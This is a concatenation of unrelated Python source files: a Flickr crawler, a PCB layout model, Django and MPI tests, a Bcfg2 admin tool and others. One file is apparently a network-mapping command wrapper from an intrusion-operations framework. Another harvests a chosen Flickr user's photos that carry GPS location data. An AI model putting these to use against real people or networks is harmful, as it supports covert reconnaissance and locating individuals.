    # NOTE: These could go here or in _post_dump - it's unclear which is better right now
    module_type = properties.String('module_type', default='DESIGN_SPACE')
    schema_id = properties.UUID('schema_id', default=UUID('f3907a58-aa46-462c-8837-a5aa9605e79e'))
    def __init__(self,
                 name: str,
                 description: str,
                 descriptors: List[Descriptor],
                 data: List[Mapping[str, Any]],
                 # NOTE(review): Session() as a default is evaluated once at
                 # import and shared by every instance — confirm intentional.
                 session: Session = Session()):
        self.name: str = name
        self.description: str = description
        self.descriptors: List[Descriptor] = descriptors
        self.data: List[Mapping[str, Any]] = data
        self.session: Session = session
    def _post_dump(self, data: dict) -> dict:
        # The API expects the name duplicated at the top level as display_name.
        data['display_name'] = data['config']['name']
        return data
    def __str__(self):
        return '<EnumeratedDesignSpace {!r}>'.format(self.name)
|
import flickr_api
from multiprocessing.pool import ThreadPool
import flickr_api.flickrerrors
import threading
import sys
import logging
class Photo:
    """Wrapper around a flickr_api photo object that lazily holds its EXIF data."""
    # Lower-cased EXIF tag names that indicate the photo carries GPS info.
    _GPS_TAGS = ['gpslatitude','gps','gps latitude','gps position','gps altitude', 'latitude', 'position']
    def __init__(self, photo):
        self.data = photo
        # EXIF is fetched on demand (downloadExifData) to avoid an API call here.
        self.exif = {}
    def setExif(self, exif_data):
        """Inject already-fetched EXIF data (dict of tag -> raw value)."""
        self.exif = exif_data
    def hasGpsData(self):
        """Return True if any known GPS tag is present in the EXIF data."""
        return any(tag.lower() in Photo._GPS_TAGS for tag in self.exif.keys())
    def downloadExifData(self):
        """Fetch EXIF from Flickr; on failure, log and leave self.exif unchanged."""
        photo = self.data
        try:
            logging.info('Retrieving EXIF data of {}'.format(photo.id))
            self.exif = self._exifToDict(photo.getExif())
        except flickr_api.flickrerrors.FlickrAPIError as e:
            logging.error('Failed to retrieve EXIF data of photo {}, | Error: {}'.format(photo.id, e))
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit; catch only real errors.
            logging.error('Failed to retrieve EXIF data of photo {}, | Error: {}'.format(photo.id, sys.exc_info()[0]))
        return self.exif
    def _exifToDict(self, exif):
        """Convert flickr_api Exif entries to a {tag: raw} dict."""
        return {
            x.tag : x.raw
            for x in exif
        }
class FlickrUserExplorer:
    """Crawls a Flickr user's photo pages in parallel and filters by GPS EXIF."""
    # url: url to user's profile
    def __init__(self, url, threads = 4):
        logging.info('Loading user: {}'.format(url))
        self.user = flickr_api.Person.findByUrl(url)
        logging.info('User loaded')
        self.discovered_photos = []
        self.filtered_photos= []
        # Guards filtered_photos, appended to from worker threads.
        self.filtered_photos_lock = threading.RLock()
        self.MAX_THREADS = threads
    # a target function for threads spawned by findPhotos method
    def _retrievePhotosFromPage(self, page_number):
        photos = self.user.getPhotos(page= page_number)
        logging.info('Explored page {}, {} photos found'.format(page_number, len(photos)))
        return photos
    def _retrievePhotoExif(self, photo):
        # convert the object returned by flickr_api into a Photo object
        photo = Photo(photo)
        photo.downloadExifData()
        if photo.hasGpsData():
            with self.filtered_photos_lock:
                self.filtered_photos.append(photo)
        else:
            logging.info('Filtering out photo {} for not having GPS data'.format(photo.data.id))
    # Find all photos in the user's pages from start_page to end_page inclusive.
    # NOTE(review): the old comment claimed end_page was optional; both
    # arguments are in fact required.
    def findPhotos(self, start_page, end_page):
        if start_page > end_page:
            raise ValueError('Invalid page numbers')
        # Accumulates the photos from every fetched page.
        all_photos = []
        pages = range(start_page, end_page+1)
        thread_pool = ThreadPool(processes= self.MAX_THREADS)
        results = thread_pool.map(self._retrievePhotosFromPage, pages)
        thread_pool.close()
        thread_pool.join()
        for x in results:
            all_photos.extend(x)
        logging.info('Total {} photos found'.format(len(all_photos)))
        return all_photos
    # Find photos carrying GPS EXIF data in the given page range (inclusive).
    def findPhotosWithGeoTag(self, start_page, end_page):
        photos = self.findPhotos(start_page, end_page)
        # photos = photos[:20] # todo remove, added only for debugging
        logging.info('Retrieving exif data of found photos')
        thread_pool = ThreadPool(processes= self.MAX_THREADS)
        # maps all photo objects to Photo objects, with exif data
        thread_pool.map_async(self._retrievePhotoExif, photos)
        thread_pool.close()
        thread_pool.join()
        logging.info('-----Photos with GPS data found: {}-----'.format(len(self.filtered_photos)))
        return self.filtered_photos
|
import ops.cmd
import ops
import ops.env
import ops.cmd.safetychecks
from ops.cmd import getBoolOption, setBoolOption, getValueOption, setListOption
# Re-export so callers can catch command errors via this module.
OpsCommandException = ops.cmd.OpsCommandException
# Option names the netmap plugin accepts.
VALID_OPTIONS = ['minimal', 'type']
class NetmapCommand(ops.cmd.DszCommand, ):
    """Dsz 'netmap' command wrapper with option validation and a safety check."""
    optgroups = {}
    reqgroups = []
    reqopts = []
    defopts = {}
    def __init__(self, plugin='netmap', netmap_type=None, **optdict):
        ops.cmd.DszCommand.__init__(self, plugin, **optdict)
        # Stored through the netmap_type property below ('type' option).
        self.netmap_type = netmap_type
    def validateInput(self):
        # Reject any option name the netmap plugin does not understand.
        for opt in self.optdict:
            if (opt not in VALID_OPTIONS):
                return False
        return True
    # Property pairs map the 'minimal' flag and the 'type' choice
    # (all/connected/remembered) onto the underlying option dictionary.
    minimal = property((lambda x: getBoolOption(x, 'minimal')), (lambda x, y: setBoolOption(x, y, 'minimal')))
    netmap_type = property((lambda x: getValueOption(x, 'type')), (lambda x, y: setListOption(x, y, 'type', ['all', 'connected', 'remembered'])))
    def mySafetyCheck(self):
        """Return (ok, message): ok is False if OPS_NONETMAP is set or options are invalid."""
        good = True
        msgparts = []
        # NOTE(review): assumes ops.env.get always returns a string — a None
        # return would raise AttributeError on .upper(); confirm.
        if (ops.env.get('OPS_NONETMAP').upper() == 'TRUE'):
            good = False
            msgparts.append('OPS_NONETMAP is set to TRUE, you should probably not run a netmap')
        if (not self.validateInput()):
            good = False
            msgparts.append('Your command did not pass input validation')
        msg = ''
        if (len(msgparts) > 0):
            msg = msgparts[0]
            for msgpart in msgparts[1:]:
                msg += ('\n\t' + msgpart)
        return (good, msg)
# Register the command class, its accepted options, and the safety-check hook.
ops.cmd.command_classes['netmap'] = NetmapCommand
ops.cmd.aliasoptions['netmap'] = VALID_OPTIONS
ops.cmd.safetychecks.addSafetyHandler('netmap', 'ops.cmd.netmap.mySafetyCheck')
|
#!/usr/bin/env python2
""" The layout class """
# upconvert.py - A universal hardware design file format converter using
# Format: upverter.com/resources/open-json-format/
# Development: github.com/upverter/schematic-file-converter
#
# Copyright 2011 Upverter, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from upconvert.core.shape import Arc
class Layout:
    """ Represents the design schematic as a PCB Layout. """
    def __init__(self):
        # Ordered PCB layers (copper/mask/silk/drill).
        self.layers = []
    def generate_netlist(self):
        """ Generate a netlist from the layout. """
        # Not implemented yet.
        pass
    def json(self):
        """ Return the layout as JSON """
        serialized_layers = [layer.json() for layer in self.layers]
        return {"layers": serialized_layers}
class Layer:
    """ A layer in the layout (ie, a PCB layer). """

    def __init__(self, name='', type_=''):
        self.name = name
        # One of copper/mask/silk/drill.
        self.type = type_
        self.images = []
        self.apertures = {}
        self.macros = {}
        self.vias = []
        self.components = []

    def json(self):
        """ Return the layer as JSON """
        result = {"type": self.type}
        result["images"] = [img.json() for img in self.images]
        result["apertures"] = [ap.json() for ap in self.apertures.values()]
        result["macros"] = [mac.json() for mac in self.macros.values()]
        result["vias"] = [via.json() for via in self.vias]
        result["components"] = [comp.json() for comp in self.components]
        return result
class Image:
    """
    An image layer (not a PCB layer).

    Image layers can be additive or subtractive and are applied in the
    order they appear in the layer[n].images list of the Layout to build
    up the final image for a single PCB layer (ie, a single gerber file).
    A subtractive image only subtracts from previous image layers, never
    from subsequent ones.

    Example
    =======
    A ground plane partly negated to make room for traces is modelled as
    three image layers, in order:
        1. the ground plane
        2. the area(s) to be negated (as a subtractive image)
        3. the traces laid within the negated area(s)
    """

    def __init__(self, name='Untitled Image', is_additive=True):
        self.name = name
        self.is_additive = is_additive
        self.x_repeats = 1
        self.x_step = None
        self.y_repeats = 1
        self.y_step = None
        self.traces = []
        self.fills = []
        self.smears = []
        self.shape_instances = []

    def not_empty(self):
        """ True if the image holds any drawable content (not just metadata). """
        return bool(self.traces or self.fills or self.smears or
                    self.shape_instances)

    def get_trace(self, width, end_pts):
        """
        Get a trace given a width and pair of points.
        Return None if no Trace is found.

        Params:
            width - float
            end_pts - tuple of 2 Points (ie, the endpoints of
                      the segment we wish to attach)
        """
        start, end = end_pts
        for candidate in self.traces:
            # Width is a per-trace attribute, so check it once per trace.
            if candidate.width != width:
                continue
            for seg in candidate.segments:
                if isinstance(seg, Arc):
                    endpoints = seg.ends()
                else:
                    endpoints = (seg.p1, seg.p2)
                if start in endpoints or end in endpoints:
                    return candidate
        return None

    def json(self):
        """ Return the image as JSON """
        return {
            "name": self.name,
            "is_additive": 'true' if self.is_additive else 'false',
            "x_repeats": self.x_repeats,
            "x_step": self.x_step,
            "y_repeats": self.y_repeats,
            "y_step": self.y_step,
            "traces": [trc.json() for trc in self.traces],
            "fills": [fil.json() for fil in self.fills],
            "smears": [smr.json() for smr in self.smears],
            "shape_instances": [inst.json() for inst in self.shape_instances]
        }
class Trace:
    """ A collection of connected segments (lines/arcs). """

    def __init__(self, width, segments=None):
        self.width = width
        # Falls back to a fresh list when no (truthy) segments are given.
        self.segments = segments or []

    def json(self):
        """ Return the trace as JSON """
        return {"width": self.width,
                "segments": [seg.json() for seg in self.segments]}
class Fill:
    """
    A closed loop of connected segments (lines/arcs).

    The segments define the outline of the fill; they must be contiguous,
    listed in order (each one touching the previous and the next) and must
    not intersect each other.
    """

    def __init__(self, segments=None):
        self.segments = segments or []

    def json(self):
        """ Return the fill as JSON """
        return {"segments": [seg.json() for seg in self.segments]}
class Smear:
    """ A line drawn by a rectangular aperture. """

    def __init__(self, line, shape):
        self.line = line
        self.shape = shape

    def json(self):
        """ Return the smear as JSON """
        return {"line": self.line.json(), "shape": self.shape.json()}
class ShapeInstance:
    """
    An instance of a shape defined by an aperture.

    Rather than wrapping the aperture itself, we wrap its constituent
    shape and hole defs, because gerber does not prohibit an aperture
    from being redefined at some arbitrary point in the file.
    The x and y attributes serve as an offset.
    """

    def __init__(self, point, aperture):
        self.x = point.x
        self.y = point.y
        self.shape = aperture.shape
        self.hole = aperture.hole

    def json(self):
        """ Return the shape instance as JSON """
        # Macro-defined shapes are referenced by name (a str); simple
        # shapes serialize themselves.
        shape_json = self.shape if isinstance(self.shape, str) else self.shape.json()
        return {"x": self.x,
                "y": self.y,
                "shape": shape_json,
                "hole": self.hole and self.hole.json()}
class Aperture:
    """
    A simple shape, with or without a hole.

    If the shape is not defined by a macro, its class must be one of
    Circle, Rectangle, Obround or RegularPolygon, and it may have a
    hole whose class must be either Circle or Rectangle. Shape and
    hole are both centered on the origin; placement is handled by
    metadata connected to the aperture when it is used.

    Holes must be fully contained within the shape. Holes never
    rotate, even if the shape is rotatable (ie, a RegularPolygon).
    """

    def __init__(self, code, shape, hole):
        self.code = code
        self.shape = shape
        self.hole = hole

    def __eq__(self, other):
        """ Compare 2 apertures. """
        # Macro-defined shapes are plain name strings: compare by name.
        if isinstance(self.shape, str) or isinstance(other.shape, str):
            return self.shape == other.shape
        shapes_match = self.shape.__dict__ == other.shape.__dict__
        holes_match = (self.hole == other.hole or
                       (self.hole and other.hole and
                        self.hole.__dict__ == other.hole.__dict__))
        return shapes_match and holes_match

    def json(self):
        """ Return the aperture as JSON """
        shape_json = self.shape if isinstance(self.shape, str) else self.shape.json()
        return {"code": self.code,
                "shape": shape_json,
                "hole": self.hole and self.hole.json()}
class Macro:
    """
    Complex shape built from multiple primitives.

    Primitive shapes are added together in list order; subtractive
    shapes subtract only from prior shapes, not subsequent shapes.
    """

    def __init__(self, name, primitives):
        self.name = name
        self.primitives = primitives

    def json(self):
        """ Return the macro as JSON """
        return {"name": self.name,
                "primitives": [prm.json() for prm in self.primitives]}
class Primitive:
    """ A shape with rotation and exposure modifiers. """

    def __init__(self, is_additive, rotation, shape):
        self.is_additive = is_additive
        self.rotation = rotation
        self.shape = shape

    def json(self):
        """ Return the primitive as JSON """
        return {"is_additive": 'true' if self.is_additive else 'false',
                "rotation": self.rotation,
                "shape": self.shape.json()}
|
"""
This software is distributed under MIT/X11 license
Copyright (c) 2021 Mauro Marini - University of Cagliari
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
from django.test import TestCase, Client
from api.document.models import DocumentVersion
from api.document.test.abstract_document_test import DocumentTestAbstract
class FrontendTestAcceptance(DocumentTestAbstract, TestCase):
    """
    Acceptance test class for frontend

    Exercises the public (unauthenticated) views: document list, document
    detail and document-version detail. Fixture objects (documents,
    operators, etc.) come from DocumentTestAbstract.
    """
    def setUp(self):
        """
        Setup method

        Adds RANGE_MAX_DOCUMENT_VERSIONS extra versions to documents[1]
        and creates a fresh, unauthenticated test client.
        :return:
        """
        self.documents_versions += [DocumentVersion.objects.create(
            author=self.pa_operators[0],
            document=self.documents[1],
        ) for _ in range(self.RANGE_MAX_DOCUMENT_VERSIONS)]
        self.client = Client()
    def test_check_created_data(self):
        """
        Check the data created by setUpTestData
        :return:
        """
        # Counts come from the abstract base fixtures; versions are doubled
        # by the extra ones added in setUp above.
        self.assertEqual(len(self.public_authorities), self.RANGE_MAX)
        self.assertEqual(len(self.pa_operators), self.RANGE_MAX)
        self.assertEqual(len(self.citizens), self.RANGE_MAX)
        self.assertEqual(len(self.documents), self.RANGE_MAX_DOCUMENTS)
        self.assertEqual(len(self.documents_versions), self.RANGE_MAX_DOCUMENT_VERSIONS * 2)
        self.assertEqual(len(self.permissions), self.RANGE_MAX_DOCUMENTS - 1)
        self.assertEqual(len(self.favorites), self.RANGE_MAX_DOCUMENTS - 1)
    # ------------------------------------------------------------------------------------------------------------------
    #
    # Document
    #
    # ------------------------------------------------------------------------------------------------------------------
    # ------------------------------------------------------------------------------------------------------------------
    # document list
    # ------------------------------------------------------------------------------------------------------------------
    def test_document_list(self):
        """
        Test the document list page not authenticated
        :return:
        """
        response = self.client.get('/', follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertLess(len(response.context['documents']), self.RANGE_MAX_DOCUMENTS)  # only public documents are shown
    # ------------------------------------------------------------------------------------------------------------------
    # document detail
    # ------------------------------------------------------------------------------------------------------------------
    def test_document_detail(self):
        """
        Test the document detail page (public document) not authenticated
        :return:
        """
        response = self.client.get('/2', follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.context['versions']), self.RANGE_MAX_DOCUMENT_VERSIONS)
    def test_document_detail_private_not_viewable_document(self):
        """
        Test the document detail page for a private document, not
        authenticated: must 404.
        :return:
        """
        response = self.client.get('/1', follow=True)
        self.assertEqual(response.status_code, 404)
    # ------------------------------------------------------------------------------------------------------------------
    # document version detail
    # ------------------------------------------------------------------------------------------------------------------
    def test_document_version_detail(self):
        """
        Test the document version detail page not authenticated
        :return:
        """
        response = self.client.get('/version/11', follow=True)
        self.assertEqual(response.status_code, 200)
    def test_document_version_detail_fail_document_private(self):
        """
        Test the document version detail page for a version of a private
        document, not authenticated: must 404.
        :return:
        """
        response = self.client.get('/version/8', follow=True)
        self.assertEqual(response.status_code, 404)  # associate to document 1 (private)
|
import argparse
import os
import shutil
from contextlib import suppress

# Generated artifacts removed from each completed experiment directory.
_FILES_TO_REMOVE = (
    'interrupt_trace.csv',
    'interrupt_trace.stats.csv',
    'sequence.csv',
    'trace.h',
    'rx_times.csv',
    # 'packet_trace.csv',  # intentionally kept (was already disabled)
)


def clean_experiments(root):
    """Remove generated artifacts from every experiment folder under *root*.

    A directory counts as an experiment folder when it is a leaf or contains
    only a 'figures' subdirectory. Missing files are silently ignored
    (matching the old ``rm ... > /dev/null`` behavior, but without spawning
    a shell or breaking on paths with spaces).
    """
    for top, dirs, _files in os.walk(root):
        if dirs == ['figures'] or dirs == []:
            for name in _FILES_TO_REMOVE:
                with suppress(OSError):
                    os.remove(os.path.join(top, name))
            # Remove the figures directory tree, if present.
            shutil.rmtree(os.path.join(top, 'figures'), ignore_errors=True)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Cleans experiments folder.')
    parser.add_argument('-e', default='no_dos', help='Path to experiments folder')
    args = parser.parse_args()
    # Iterate though experiment folders.
    clean_experiments(args.e)
|
from draco.core.containers import GainData
from caput import mpiarray, mpiutil
import pytest
import glob
import numpy as np
import os
# Run these tests under MPI
pytestmark = pytest.mark.mpi
comm = mpiutil.world
rank, size = mpiutil.rank, mpiutil.size
# Common length shared by every axis/dataset in these tests.
len_axis = 8
# 3-D dataset used for the "gain" dataset (axes: freq, input, time).
dset1 = np.arange(len_axis * len_axis * len_axis)
dset1 = dset1.reshape((len_axis, len_axis, len_axis))
# 2-D dataset used for the "weight" dataset (axes: freq, time).
dset2 = np.arange(len_axis * len_axis)
dset2 = dset2.reshape((len_axis, len_axis))
freqs = np.arange(len_axis)
inputs = np.arange(len_axis)
times = np.arange(len_axis)
# Axis selections applied when the containers are reloaded from disk.
fsel = slice(5)
isel = slice(1, 4)
tsel = slice(1, 4)
@pytest.fixture
def container_on_disk():
    """Write a serial GainData container to disk and yield its filename."""
    fname = "tmp_test_memh5_select.h5"
    container = GainData(freq=freqs, input=inputs, time=times)
    container.create_dataset("gain", data=dset1.view())
    container.create_dataset("weight", data=dset2.view())
    container.save(fname)
    yield fname
    # Ensure that all ranks have run their tests before deleting
    if size > 1:
        comm.Barrier()
    # tear down: only rank 0 removes the file (and any suffixed siblings)
    file_names = glob.glob(fname + "*")
    if rank == 0:
        for fname in file_names:
            os.remove(fname)
# Per-rank slice of the global first axis, used to build the distributed
# MPIArrays below (axis 0 is split evenly across ranks).
local_from = int(len_axis / size * rank)
local_to = int(len_axis / size * (rank + 1))
global_data1 = np.arange(len_axis * len_axis * len_axis, dtype=np.float32)
local_data1 = global_data1.reshape(len_axis, -1, len_axis)[local_from:local_to]
d_array1 = mpiarray.MPIArray.wrap(local_data1, axis=0)
global_data2 = np.arange(len_axis * len_axis, dtype=np.float32)
local_data2 = global_data2.reshape(len_axis, -1)[local_from:local_to]
d_array2 = mpiarray.MPIArray.wrap(local_data2, axis=0)
@pytest.fixture
def container_on_disk_distributed():
    """Write a distributed container, reload it with axis selections
    applied, re-save it, and yield the filename.
    """
    fname = "tmp_test_memh5_select_distributed.h5"
    container = GainData(freq=freqs, input=inputs, time=times)
    container.create_dataset("gain", data=d_array1)
    container.create_dataset("weight", data=d_array2)
    container.save(fname)
    # load file and apply selection
    md = GainData.from_file(
        fname, freq_sel=fsel, input_sel=isel, time_sel=tsel, distributed=True
    )
    # save it again (so the on-disk file already contains the selection)
    md.save(fname)
    yield fname
    # Ensure that all ranks have run their tests before deleting
    if size > 1:
        comm.Barrier()
    # tear down: only rank 0 removes the file(s)
    file_names = glob.glob(fname + "*")
    if rank == 0:
        for fname in file_names:
            os.remove(fname)
def test_H5FileSelect(container_on_disk):
    """Tests that makes hdf5 objects and tests selecting on their axes."""
    loaded = GainData.from_file(
        container_on_disk, freq_sel=fsel, input_sel=isel, time_sel=tsel
    )
    # Datasets come back down-selected along every axis...
    assert np.all(loaded["gain"][:] == dset1[(fsel, isel, tsel)])
    assert np.all(loaded["weight"][:] == dset2[(fsel, tsel)])
    # ...and the index maps match the corresponding slices.
    for axis, sel, values in (("freq", fsel, freqs),
                              ("input", isel, inputs),
                              ("time", tsel, times)):
        assert np.all(loaded.index_map[axis] == values[sel])
def test_H5FileSelect_distributed(container_on_disk):
    """Load H5 into parallel container while down-selecting axes."""
    loaded = GainData.from_file(
        container_on_disk,
        freq_sel=fsel,
        input_sel=isel,
        time_sel=tsel,
        distributed=True,
    )
    # Same expectations as the serial case, but via the distributed loader.
    assert np.all(loaded["gain"][:] == dset1[(fsel, isel, tsel)])
    assert np.all(loaded["weight"][:] == dset2[(fsel, tsel)])
    for axis, sel, values in (("freq", fsel, freqs),
                              ("input", isel, inputs),
                              ("time", tsel, times)):
        assert np.all(loaded.index_map[axis] == values[sel])
def test_H5FileSelect_distributed_on_disk(container_on_disk_distributed):
    """Load distributed H5 into parallel container while down-selecting axes."""
    # The fixture already applied fsel/isel/tsel before re-saving, so a
    # plain serial reload on rank 0 must match the sliced global arrays.
    if rank == 0:
        md = GainData.from_file(container_on_disk_distributed, distributed=False)
        assert np.all(md["gain"][:] == dset1[(fsel, isel, tsel)])
        assert np.all(md["weight"][:] == dset2[(fsel, tsel)])
        assert np.all(md.index_map["freq"] == freqs[fsel])
        assert np.all(md.index_map["input"] == inputs[isel])
        assert np.all(md.index_map["time"] == times[tsel])
def test_test_H5FileSelect_distributed_on_disk_simple():
    """
    Load distributed H5 into parallel container while down-selecting axes.

    This test does the same as `test_H5FileSelect_distributed_on_disk` but it checks the
    frequencies distributed to each node after selection instead of writing to disk
    before checking.
    """
    if size != 4:
        pytest.skip("This test has to be run with mpirun -np 4")
    len_axis = 8
    # Per-rank slice of the first (freq) axis.
    local_from = int(len_axis / size * rank)
    local_to = int(len_axis / size * (rank + 1))
    # `np.int` was deprecated in NumPy 1.20 and removed in 1.24; it was an
    # alias for the builtin int, so use that directly.
    global_data1 = np.arange(len_axis * len_axis * len_axis, dtype=int)
    local_data1 = global_data1.reshape(len_axis, -1, len_axis)[local_from:local_to]
    d_array1 = mpiarray.MPIArray.wrap(local_data1, axis=0)
    global_data2 = np.arange(len_axis * len_axis, dtype=int)
    local_data2 = global_data2.reshape(len_axis, -1)[local_from:local_to]
    d_array2 = mpiarray.MPIArray.wrap(local_data2, axis=0)
    fname = "tmp_test_memh5_select_distributed_simple.h5"
    container = GainData(freq=freqs, input=inputs, time=times)
    container.create_dataset("gain", data=d_array1)
    container.create_dataset("weight", data=d_array2)
    container.save(fname)
    # load file and apply selection
    fsel = slice(5)
    md = GainData.from_file(fname, freq_sel=fsel, distributed=True)
    # test: the 5 selected frequencies are redistributed over the 4 ranks
    if rank == 0:
        # should hold freq indices 0 and 1
        assert np.all(md["gain"][:] == dset1[(slice(2), slice(None), slice(None))])
        assert np.all(md["weight"][:] == dset2[(slice(2), slice(None))])
        assert np.all(md.index_map["freq"] == freqs[fsel])
    else:
        # should hold 1 freq index each
        assert np.all(
            md["weight"][:] == dset2[(slice(rank + 1, rank + 2), slice(None))]
        )
        assert np.all(
            md["gain"][:]
            == dset1[(slice(rank + 1, rank + 2), slice(None), slice(None))]
        )
        assert np.all(md.index_map["freq"] == freqs[fsel])
    # tear down: only rank 0 removes the file(s)
    file_names = glob.glob(fname + "*")
    if rank == 0:
        for fname in file_names:
            os.remove(fname)
|
from datetime import date
import sys
# Prereq issues can be signaled with ImportError, so no try needed
import sqlalchemy, sqlalchemy.orm
import Bcfg2.Server.Admin
import Bcfg2.Server.Snapshots
import Bcfg2.Server.Snapshots.model
from Bcfg2.Server.Snapshots.model import Snapshot, Client, Metadata, Base, \
File, Group, Package, Service
# Compatibility import
from Bcfg2.Bcfg2Py3k import u_str
class Snapshots(Bcfg2.Server.Admin.Mode):
    """bcfg2-admin mode for interacting with the Snapshots database.

    Sub-commands:
        init           -- create the snapshots database tables
        query <qtype>  -- list stored objects of the given type
        dump <client>  -- show the latest snapshot for a client
        reports ...    -- reporting queries (-a, -b <client>, -e <client>,
                          --date <year> <month> <day>)
    """
    __shorthelp__ = "Interact with the Snapshots system"
    __longhelp__ = (__shorthelp__ + "\n\nbcfg2-admin snapshots init"
                    "\nbcfg2-admin query qtype\n")
    __usage__ = ("bcfg2-admin snapshots [init|query qtype]")
    # Maps the CLI query-type argument to its ORM model class.
    q_dispatch = {'client': Client,
                  'group': Group,
                  'metadata': Metadata,
                  'package': Package,
                  'snapshot': Snapshot}

    def __init__(self, setup):
        Bcfg2.Server.Admin.Mode.__init__(self, setup)
        # One session is shared by all sub-commands of this invocation.
        self.session = Bcfg2.Server.Snapshots.setup_session(self.configfile)
        self.cfile = self.configfile

    def __call__(self, args):
        """Dispatch to the requested snapshots sub-command."""
        Bcfg2.Server.Admin.Mode.__call__(self, args)
        if len(args) == 0 or args[0] == '-h':
            print(self.__usage__)
            raise SystemExit(0)
        if args[0] == 'query':
            if args[1] in self.q_dispatch:
                q_obj = self.q_dispatch[args[1]]
                if q_obj == Client:
                    rows = []
                    labels = ('Client', 'Active')
                    # NOTE: '== False' / '== True' below are SQLAlchemy
                    # column expressions (SQL filters), not Python
                    # comparisons -- do not "simplify" them.
                    for host in \
                       self.session.query(q_obj).filter(q_obj.active == False):
                        rows.append([host.name, 'No'])
                    for host in \
                       self.session.query(q_obj).filter(q_obj.active == True):
                        rows.append([host.name, 'Yes'])
                    self.print_table([labels] + rows,
                                     justify='left',
                                     hdr=True,
                                     vdelim=" ",
                                     padding=1)
                elif q_obj == Group:
                    print("Groups:")
                    for group in self.session.query(q_obj).all():
                        print(" %s" % group.name)
                else:
                    # Executed so schema/connection errors surface, although
                    # no output is produced for the remaining types.
                    self.session.query(q_obj).all()
            else:
                print('error')
                raise SystemExit(1)
        elif args[0] == 'init':
            # Initialize the Snapshots database
            dbpath = Bcfg2.Server.Snapshots.db_from_config(self.cfile)
            engine = sqlalchemy.create_engine(dbpath, echo=True)
            metadata = Base.metadata
            metadata.create_all(engine)
            Session = sqlalchemy.orm.sessionmaker()
            Session.configure(bind=engine)
            session = Session()
            session.commit()
        elif args[0] == 'dump':
            client = args[1]
            snap = Snapshot.get_current(self.session, u_str(client))
            if not snap:
                print("Current snapshot for %s not found" % client)
                sys.exit(1)
            print("Client %s last run at %s" % (client, snap.timestamp))
            for pkg in snap.packages:
                print("C:", pkg.correct, 'M:', pkg.modified)
                print("start", pkg.start.name, pkg.start.version)
                print("end", pkg.end.name, pkg.end.version)
        elif args[0] == 'reports':
            # bcfg2-admin reporting interface for Snapshots
            if '-a' in args[1:]:
                # Query all hosts for Name, Status, Revision, Timestamp
                q = self.session.query(Client.name,
                                       Snapshot.correct,
                                       Snapshot.revision,
                                       Snapshot.timestamp)\
                        .filter(Client.id == Snapshot.client_id)\
                        .group_by(Client.id)
                rows = []
                labels = ('Client', 'Correct', 'Revision', 'Time')
                for item in q.all():
                    # BUG FIX: the query yields (name, correct, revision,
                    # timestamp); the previous unpacking swapped the
                    # Revision and Time columns in the output table.
                    cli, cor, rev, tstamp = item
                    rows.append([cli, cor, rev, tstamp])
                self.print_table([labels] + rows,
                                 justify='left',
                                 hdr=True, vdelim=" ",
                                 padding=1)
            elif '-b' in args[1:]:
                # Query a single host for bad entries
                if len(args) < 3:
                    print("Usage: bcfg2-admin snapshots -b <client>")
                    return
                client = args[2]
                snap = Snapshot.get_current(self.session, u_str(client))
                if not snap:
                    print("Current snapshot for %s not found" % client)
                    sys.exit(1)
                print("Bad entries:")
                bad_pkgs = [self.session.query(Package)
                            .filter(Package.id == p.start_id).one().name
                            for p in snap.packages if p.correct == False]
                for p in bad_pkgs:
                    print(" Package:%s" % p)
                bad_files = [self.session.query(File)
                             .filter(File.id == f.start_id).one().name
                             for f in snap.files if f.correct == False]
                for filename in bad_files:
                    print(" File:%s" % filename)
                bad_svcs = [self.session.query(Service)
                            .filter(Service.id == s.start_id).one().name
                            for s in snap.services if s.correct == False]
                for svc in bad_svcs:
                    print(" Service:%s" % svc)
            elif '-e' in args[1:]:
                # Query a single host for extra entries
                client = args[2]
                snap = Snapshot.get_current(self.session, u_str(client))
                if not snap:
                    print("Current snapshot for %s not found" % client)
                    sys.exit(1)
                print("Extra entries:")
                for pkg in snap.extra_packages:
                    print(" Package:%s" % pkg.name)
                # FIXME: Do we know about extra files yet?
                for f in snap.extra_files:
                    print(" File:%s" % f.name)
                for svc in snap.extra_services:
                    print(" Service:%s" % svc.name)
            elif '--date' in args[1:]:
                year, month, day = args[2:]
                timestamp = date(int(year), int(month), int(day))
                snaps = []
                for client in self.session.query(Client).filter(Client.active == True):
                    snaps.append(Snapshot.get_by_date(self.session,
                                                      client.name,
                                                      timestamp))
                rows = []
                labels = ('Client', 'Correct', 'Revision', 'Time')
                for snap in snaps:
                    rows.append([snap.client.name,
                                 snap.correct,
                                 snap.revision,
                                 snap.timestamp])
                self.print_table([labels] + rows,
                                 justify='left',
                                 hdr=True,
                                 vdelim=" ",
                                 padding=1)
            else:
                print("Unknown options: ", args[1:])
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
import update_reference_build as update_ref_build
# Disable for accessing private API of update_reference_build class.
# pylint: disable=protected-access
class UpdateReferenceBuildUnittest(unittest.TestCase):
    """Unit tests for BuildUpdater's platform-to-version resolution."""
